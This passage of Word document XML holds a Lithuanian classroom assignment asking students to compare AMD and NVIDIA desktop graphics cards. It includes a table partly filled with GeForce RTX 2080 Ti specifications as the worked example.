          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> AMD ir NVIDIA skirtas stacionariems kompiuteriams</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir palygin</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų charakteristikas (GPU architektūrą, gaminimo technologij</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Pagal pateiktą apačioje pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelę ir,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>remdamiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>surinkta informacija apie pasirinktas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vaizdo plokštes</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įrašykite joje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvadas bei apibendrinimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF063CF" w14:textId="290B8B0B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>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6"/>
        <w:gridCol w:w="2478"/>
        <w:gridCol w:w="2484"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6F6BDB8C" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1431A676" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vaizdo plokštės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6BB92908" w14:textId="77777777" w:rsidR="00455122" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>GeForce RTX 2080 Ti</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FCBC16D" w14:textId="0B197C10" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Founders Edition</w:t>
            </w:r>
            <w:r w:rsidR="49E6692F" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> arba AMD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1F3E2758" w14:textId="7CB380E4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="49E6692F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD arba NVIDIA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C85427" w14:textId="1EEA0766" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E51490A" w14:textId="7CB380E4" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="49E6692F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD arba NVIDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="268FF157" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="17D27EAD"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Technologija</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="01526D39"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 xml:space="preserve">12nm </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5234C3ED"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4D4D38FC"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5DD52299" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B2A6F9E"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Architektūra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2608F883"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Turing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="413273A9" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="478BEB78" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="519ED008" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="549D36C6"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Tranzistorių kiekis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2E4B390D"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18,600 mil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16D86983" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07548C80" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="430669E7" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="549FB253"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Branduolių skaičius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0D88F7D1"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NVIDIA CUDA cores 4352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A97C259" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0B07BDBB" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6EDA4EEE" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="68199AE2"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Kitų branduolių</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3957B362"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RT cores 78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="748983ED" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A970652" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="54765A05" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4812E3D1"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Taktinis dažnis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BA9D5F"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boost clock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D34142F"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1350/ 1635 (OC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="01F744A4" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0610FAE8" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5064F996" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B684414"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Magistralė PCI Express 3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A088EC1"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PCIe 3.0 x16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="455953A3" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0EEA5FAC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1FD909F6" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4CC7E0DC"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Atminties greitis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B0A2AF2"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14 Gbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="401E4348" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6407F1ED" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A35E875" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="645FD551"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 xml:space="preserve">Atminties standartas </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ir talpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B87720C"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lastRenderedPageBreak/>
              <w:t>11 GB GDDR6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="262F063C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="750EF766" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="472767D1" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6123B9A0"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Atminties magistralė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32952942"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352 bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1F5CA5AA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="404C38AF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="089BB2A2" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4DC69963"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Atminties pralaidumas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="56F74A59"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616GB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="67EC1AF0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
